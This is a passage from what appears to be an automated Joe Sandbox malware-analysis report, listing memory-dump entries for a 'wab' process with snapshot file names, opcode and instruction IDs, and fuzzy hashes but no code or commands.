                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4641f302e3f2936674a928af7339161c6b8f6182a5bc2d3485fada6b3ea39ffc
                                                • Instruction ID: e9421d441b35f7e6c28d58275c29959143a9735338ca9bc4f706e24b3e7c5fc0
                                                • Opcode Fuzzy Hash: 4641f302e3f2936674a928af7339161c6b8f6182a5bc2d3485fada6b3ea39ffc
                                                • Instruction Fuzzy Hash: 16015E74D0024AEFDF00DFA8D8449AEBBB2FB49300F504566DA10A7351D775AA29DF91
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1468ae9cf5336ee05094a19b0caafe595fb1079a0472cd58769721b78d9dd25
                                                • Instruction ID: c77c57762db190bb6d7e588d69ce10dc1f6af1815e81760613ae25557f6207cf
                                                • Opcode Fuzzy Hash: a1468ae9cf5336ee05094a19b0caafe595fb1079a0472cd58769721b78d9dd25
                                                • Instruction Fuzzy Hash: 96E0C97A740104AFDB118E84DC45FDDBBB2FB8C711F144155FA11A72A0C631A821CB50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f38a2380231e5d31daeaa302cad056ec22eb3097b1b6095eda0ab9ae8e14ebd
                                                • Instruction ID: 5d13f3260835d3210541fa47c1d0175414335af2a3dcbe2d873b1ee26b1b7dc3
                                                • Opcode Fuzzy Hash: 8f38a2380231e5d31daeaa302cad056ec22eb3097b1b6095eda0ab9ae8e14ebd
                                                • Instruction Fuzzy Hash: 9FE0CD32D2026A97CB1097A1DC044DEBB38EDC5151B404651D51033040EB302559C3A1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be677959601e26a4e5786ef93a003353aac5eacd757b5f567214594b62a6f9df
                                                • Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
                                                • Opcode Fuzzy Hash: be677959601e26a4e5786ef93a003353aac5eacd757b5f567214594b62a6f9df
                                                • Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 475cb156ada6fa653574ac6ec083185852ffd44c452d8fff6e3ac5f3b60ff239
                                                • Instruction ID: 09a9f2c5412fe7bb51ec66f0518186023f134cf86948a4fddf2733e96a77bc0f
                                                • Opcode Fuzzy Hash: 475cb156ada6fa653574ac6ec083185852ffd44c452d8fff6e3ac5f3b60ff239
                                                • Instruction Fuzzy Hash: 26D05B316103154FF701FBB5D805A153B27BBC4510F508350D5040754BEFF868194BD2
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4eb0ddc60e76e7080b13235c24053608174c5e5ec05c0c5ef65749420e323bb
                                                • Instruction ID: c8aaf4f6b5912af3b8b15c333ec0083902adfb7d0ee2f6dff55dad875fcddcff
                                                • Opcode Fuzzy Hash: c4eb0ddc60e76e7080b13235c24053608174c5e5ec05c0c5ef65749420e323bb
                                                • Instruction Fuzzy Hash: 00D0673AB00008AFDB149F99E844DDDF776FB98321B048116F915A3260C6359925DB60
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7bc30a0de429efe588169fdfd0bb6162155db550b66b24201e2f253ef04e9bed
                                                • Instruction ID: 52b4639e26794d2b81456a8b7d0e8f19befa1cd001447d086b54e7cb1c43f648
                                                • Opcode Fuzzy Hash: 7bc30a0de429efe588169fdfd0bb6162155db550b66b24201e2f253ef04e9bed
                                                • Instruction Fuzzy Hash: 75C012303003194FE501EBA5DC4491A371B7AD05017908550D5050954FDFF8AC464BD2
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 299ed08a6686cbbca173e402cbf9177953238441e5fb0d16e19a501f598b1c83
                                                • Instruction ID: 68f2f234a1468bf06dc1ded92acf802d96ce38b951ed6c3fc1af93d93d1782c2
                                                • Opcode Fuzzy Hash: 299ed08a6686cbbca173e402cbf9177953238441e5fb0d16e19a501f598b1c83
                                                • Instruction Fuzzy Hash: D5D1BC74E01218CFDB15DFA5C984B9EBBB2BF89300F2080AAD909AB354DB355E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e3d6df00f92c61dd801679a67364c77ac8d5f47b4c5eddf311d89aae24048b4
                                                • Instruction ID: 3da16c8f242b1c649582da544d2fed58c8efee4f242754ca4a8d43086246eb24
                                                • Opcode Fuzzy Hash: 3e3d6df00f92c61dd801679a67364c77ac8d5f47b4c5eddf311d89aae24048b4
                                                • Instruction Fuzzy Hash: 96D1AC74E00218CFDB15DFA5C984B9DBBB2BF89300F1080AAD909AB364DB356E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4327ccacf17b1869a9f580e70b8e5bebbb9e2683584c40267f7c540eb60ddf0
                                                • Instruction ID: dd37a27f78cefa7781892e6d3a3a6bf31acca32a0530fc7a7b94e766b2572e07
                                                • Opcode Fuzzy Hash: d4327ccacf17b1869a9f580e70b8e5bebbb9e2683584c40267f7c540eb60ddf0
                                                • Instruction Fuzzy Hash: 43D1BC74E01218CFDB15DFA5C984B9EBBB2BF89300F1080AAD909AB354DB356E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 885fbf5b4632fd8f85dd3acc2e5b7073de5d3af607bea9c044e0a0330a8ff8f3
                                                • Instruction ID: fe834bd92a860b0c646bd49abff6521a354571d5f41c6a3d70471caab4c2df89
                                                • Opcode Fuzzy Hash: 885fbf5b4632fd8f85dd3acc2e5b7073de5d3af607bea9c044e0a0330a8ff8f3
                                                • Instruction Fuzzy Hash: 51D1AC74E01218CFDB15DFA9C984B9EBBB2BF89300F1080AAD909AB354DB355E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78ecd43c4c319d169011af1c26a7e597292ef33a7839183386a1840d8e8a138d
                                                • Instruction ID: 673d2911dec7cb97ae49dfa55d4da93e20d2daf06db8186cb3d61a9074abddb4
                                                • Opcode Fuzzy Hash: 78ecd43c4c319d169011af1c26a7e597292ef33a7839183386a1840d8e8a138d
                                                • Instruction Fuzzy Hash: EBD1BC74E01218CFDB15DFA9C984B9DBBB2BF89300F1080A9D909AB354DB755E81DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 905687d764bec151c4fe1ead8b182be66093c7bd80389d4c60f48102292a0b80
                                                • Instruction ID: 674e57cc2b2882fbc307cc8bc0aec3f0a5177be729e2ae1e55de1c4560f40b00
                                                • Opcode Fuzzy Hash: 905687d764bec151c4fe1ead8b182be66093c7bd80389d4c60f48102292a0b80
                                                • Instruction Fuzzy Hash: 47D1AC74E01318CFDB15DFA9C984B9DBBB2BF89300F1080AAD909AB364DB355A85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a3b1be34c3e01a3b91eda8a9021c97587e7431ca069085dbab5ed3992b52380
                                                • Instruction ID: ea5c80172eed9d51e15ca2e95836bdf32246214a4d2b79649972d61baba5e16e
                                                • Opcode Fuzzy Hash: 3a3b1be34c3e01a3b91eda8a9021c97587e7431ca069085dbab5ed3992b52380
                                                • Instruction Fuzzy Hash: 0BD1AD74E01218CFDB15DFA5C984B9DBBB2BF89300F1080AAD909AB354DB356E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9add5c7b25ecbc0113275f9d5bcb4c719dbda0f4c6fd6d6a47d8f2578cf8aeff
                                                • Instruction ID: ea36486cd5f0493f00f7604b0abfd79447ad549d23ad6114d8b606347d0726a6
                                                • Opcode Fuzzy Hash: 9add5c7b25ecbc0113275f9d5bcb4c719dbda0f4c6fd6d6a47d8f2578cf8aeff
                                                • Instruction Fuzzy Hash: BBD1AD74E01218CFDB15DFA5C984B9DBBB2BF89300F2080AAD909AB354DB355E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7562b0a1802a7875957b40a99bbc90df07f2a43d2a8dc05511351650aa5c5c7
                                                • Instruction ID: 3196e7730db453b951a0dad10f762d0e43b5699a1f0d2939717610da199994dd
                                                • Opcode Fuzzy Hash: d7562b0a1802a7875957b40a99bbc90df07f2a43d2a8dc05511351650aa5c5c7
                                                • Instruction Fuzzy Hash: 41D1AD74E01218CFDB15DFA9C984B9DBBB2BF89300F1080AAD909AB354DB355E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57f0914392a87a29944f2f343728fe2d48819b0457b3353cd3c48416de0c3941
                                                • Instruction ID: a6ae0cc68b8e312d4a69c38a9d6d9b43ed38cbaf753d106ff807e2e1204eadb1
                                                • Opcode Fuzzy Hash: 57f0914392a87a29944f2f343728fe2d48819b0457b3353cd3c48416de0c3941
                                                • Instruction Fuzzy Hash: 86D1AC74E00318CFEB15DFA9C984B9DBBB2AF89300F1080AAD909AB354DB755E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bfc72c4dcd7219b12000f31131ede3acc4cf4581983609e7b4ee5ed29e7fddae
                                                • Instruction ID: ad94a766efdff4493e2caac8ee052c692289d42362cfd987e48751721494922f
                                                • Opcode Fuzzy Hash: bfc72c4dcd7219b12000f31131ede3acc4cf4581983609e7b4ee5ed29e7fddae
                                                • Instruction Fuzzy Hash: D4D1AD74E01318CFDB15DFA5C984B9DBBB2AF89300F1080AAD909AB364DB355E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 853bff0f0c79fa856f2c4ee0a2968bb156ebae1c477caa1d251ff4740de56347
                                                • Instruction ID: 5cb7aa8e0fdac3f087467c4b47cb56919c52014026b43c9a49a07a441fabf157
                                                • Opcode Fuzzy Hash: 853bff0f0c79fa856f2c4ee0a2968bb156ebae1c477caa1d251ff4740de56347
                                                • Instruction Fuzzy Hash: 28D1AC74E00318CFDB15DFA5C984B9EBBB2AF89300F2080AAD909AB354DB755E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 49f4ac36634575426d7b7f66b4dac8ed4ee659f510d22e5855b59e4ed556dc1a
                                                • Instruction ID: 8c7f980dccee3d323b3771b98f0fdea4129265c693bede1d255de5554207be28
                                                • Opcode Fuzzy Hash: 49f4ac36634575426d7b7f66b4dac8ed4ee659f510d22e5855b59e4ed556dc1a
                                                • Instruction Fuzzy Hash: 93D19D74E01318CFDB15DFA5C984B9EBBB2BF89300F1080A9D909AB354DB355A85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4100a03d192dcfa6ddd5ff3245f5c16e2d6d6a27760ff53a4b7f46e564c8ece9
                                                • Instruction ID: 7ac14eeaf9efffcf84efab98e0589dc7076417fc5c9f75b583d876aa6789c0ce
                                                • Opcode Fuzzy Hash: 4100a03d192dcfa6ddd5ff3245f5c16e2d6d6a27760ff53a4b7f46e564c8ece9
                                                • Instruction Fuzzy Hash: A5D1BD74E00218CFDB15CFA9C984B9DBBB2BF89300F1080AAD909AB354DB355E81DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b7fbf71c48cd3ba09cf3ea9f18366953aba9d124c84bbabacb18ea711dc9dbbe
                                                • Instruction ID: abbe1cc8157872cde0cf7261a831bc0dfb584098ac6acfc0aca198ad07aeb978
                                                • Opcode Fuzzy Hash: b7fbf71c48cd3ba09cf3ea9f18366953aba9d124c84bbabacb18ea711dc9dbbe
                                                • Instruction Fuzzy Hash: 01D1AC74E01218CFDB15DFA5C984B9DBBB2BF89300F2080AAD909AB354DB355E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1ab365e94ba93a764e5af1490bc82899fefd4ac00f8cb4f159b9a465341bd4a
                                                • Instruction ID: 7ba9ae5fbe0647c9420beaa8971acd7219c3fbb9761a1e9a6e0300f715395fda
                                                • Opcode Fuzzy Hash: e1ab365e94ba93a764e5af1490bc82899fefd4ac00f8cb4f159b9a465341bd4a
                                                • Instruction Fuzzy Hash: D0D1BD74E01218CFDB15DFA9C984B9DBBB2BF89300F2080AAD909AB354DB355E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 59172a2100cb6b4885f68ab4ff624fab5199a9d5e1e88790858475beb9033c8d
                                                • Instruction ID: c39dce52cf034c7065171c8a7ac4be36aa87f4b26be82ac5a075888f7aee6eef
                                                • Opcode Fuzzy Hash: 59172a2100cb6b4885f68ab4ff624fab5199a9d5e1e88790858475beb9033c8d
                                                • Instruction Fuzzy Hash: CEC1AD74E01218CFEB14DFA5C984B9DBBB2BF89301F1080A9D809AB354DB359E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c729b0c3ec35df9b29c187f78508cdbb20b958af8396c4cf698412010d78f611
                                                • Instruction ID: 8f89285fb180e22b84363e4b839f2b411f0ea579c7f959ff2de0344dfaa9dc27
                                                • Opcode Fuzzy Hash: c729b0c3ec35df9b29c187f78508cdbb20b958af8396c4cf698412010d78f611
                                                • Instruction Fuzzy Hash: 60C19E74E01218CFEB14DFA5C994B9DBBB2BF89300F1081AAD809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27ef37b5a3dcf9588a98c404ad4394485e04481f57e58bd3fdffb45b35da3231
                                                • Instruction ID: 625cdd7d54734d808f5ac4ece16d75153983f414a038206497dde2cd457a5246
                                                • Opcode Fuzzy Hash: 27ef37b5a3dcf9588a98c404ad4394485e04481f57e58bd3fdffb45b35da3231
                                                • Instruction Fuzzy Hash: B9C1AE74E01218CFEB14DFA5C994B9DBBB2BF89300F2080A9D809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e226b26f9bc5b8f3374c72220209c589d32813123a0dcf7be326cd4467ce3247
                                                • Instruction ID: 92930ed8593914cabfb7a413b147a2e1b5a4fbcf140ea55c1d53d88adfb37d95
                                                • Opcode Fuzzy Hash: e226b26f9bc5b8f3374c72220209c589d32813123a0dcf7be326cd4467ce3247
                                                • Instruction Fuzzy Hash: 27C1AF74E01218CFEB14DFA5C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d9ebaebfb30bbeedc3a7d0af94a9077e65b6ffba6388eb9ede31a15d025d4ae
                                                • Instruction ID: 9decef907bd1bbaa56912d9e5e836ea342f64b52fd157bc916c206f856371f75
                                                • Opcode Fuzzy Hash: 5d9ebaebfb30bbeedc3a7d0af94a9077e65b6ffba6388eb9ede31a15d025d4ae
                                                • Instruction Fuzzy Hash: 90C1AF74E01218CFDB14DFA5C994B9DBBB2BF89301F2080AAD809AB354DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ecce8ffa34d7f0175adcb2acafb67e8d21b29ceee9ddd03d781cdaf1014a93d0
                                                • Instruction ID: 280841b92fb114ab2ecd4fb713eb43f054a520d076b9ba2a79b22298e9d856d9
                                                • Opcode Fuzzy Hash: ecce8ffa34d7f0175adcb2acafb67e8d21b29ceee9ddd03d781cdaf1014a93d0
                                                • Instruction Fuzzy Hash: 40C19E74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d89ed9740a5795fe3c9b98f30ffb22311a579caf318a6f2712fc401f8dc8b65
                                                • Instruction ID: 774f42ed5ae8b97fb73a15e3ab8fa8a202ce1ae296d0e5f5aa19347617541cb1
                                                • Opcode Fuzzy Hash: 3d89ed9740a5795fe3c9b98f30ffb22311a579caf318a6f2712fc401f8dc8b65
                                                • Instruction Fuzzy Hash: B3C1AE74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e12d818e5c32258fb5ff09e8972b4f8f3956653b6e2ba772cd323b3005965b5
                                                • Instruction ID: 5b13cd6dc75779cdd4f068afbd6e9385554669d34ab1533ebb584b954b413aa0
                                                • Opcode Fuzzy Hash: 3e12d818e5c32258fb5ff09e8972b4f8f3956653b6e2ba772cd323b3005965b5
                                                • Instruction Fuzzy Hash: B2C19F74E01218CFEB14DFA5C994B9DBBB2BF89301F1080AAD809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bffa3c607e72060134f9549b647c101bb4a11f4778465187b98215c4d71b484c
                                                • Instruction ID: 998dd94d5dd977cf15ca25b61fb7362e8ae24b31754103da61902e451800103c
                                                • Opcode Fuzzy Hash: bffa3c607e72060134f9549b647c101bb4a11f4778465187b98215c4d71b484c
                                                • Instruction Fuzzy Hash: 4BC1AD74E01218CFEB14DFA5C984B9DBBB2BF89300F1081AAD809AB354DB359E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66e8cd978bbcbe6fed1e0cb6a560ceb6e32e10169dda1d8c1dff87c1cd1ff946
                                                • Instruction ID: 780d0a75d8c2ea63ed667c5eadb7d8eafd9c755643e7bd09726c9ce02bcd9eaf
                                                • Opcode Fuzzy Hash: 66e8cd978bbcbe6fed1e0cb6a560ceb6e32e10169dda1d8c1dff87c1cd1ff946
                                                • Instruction Fuzzy Hash: A2C19E74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61a83111e133a80ac951bf6c3daf8ae789841220dc74c9eb2f310787d88ede59
                                                • Instruction ID: ddfef00f5a3567d7dd9bfb40e6ddc5eb00efdfbf5d3b1c9c3f2fda60f21832d1
                                                • Opcode Fuzzy Hash: 61a83111e133a80ac951bf6c3daf8ae789841220dc74c9eb2f310787d88ede59
                                                • Instruction Fuzzy Hash: FEC1AE74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB759E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb8e4c6005c57faa029d06d44cdd5e89868f11e3f3acfad2d68d14ae8beb3e31
                                                • Instruction ID: 5ef5aa697a347ff5cd61fae803670cf8c754dfc858f66c814f822088b92bfb15
                                                • Opcode Fuzzy Hash: fb8e4c6005c57faa029d06d44cdd5e89868f11e3f3acfad2d68d14ae8beb3e31
                                                • Instruction Fuzzy Hash: 60C19F74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4111bf02d7aad53e2a20d0f77c2b8c57ef97170d00f59e14b824b94aa34974e
                                                • Instruction ID: a702a784b1cf13d118820046110f38fe3bd90029c4dcb9175de6fbf14a73088e
                                                • Opcode Fuzzy Hash: d4111bf02d7aad53e2a20d0f77c2b8c57ef97170d00f59e14b824b94aa34974e
                                                • Instruction Fuzzy Hash: 4DC1A074E01218CFDB14DFA9C994B9DBBB2BF89300F1080A9D809AB355DB359E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd8aa0a7d8218647264293b4357c4049be86f3bcabc3d40721415afde5c878e6
                                                • Instruction ID: 15be1b4ca7606724b4fcdfb6af328a805935e3cbd4c580022327b2e35e90058c
                                                • Opcode Fuzzy Hash: cd8aa0a7d8218647264293b4357c4049be86f3bcabc3d40721415afde5c878e6
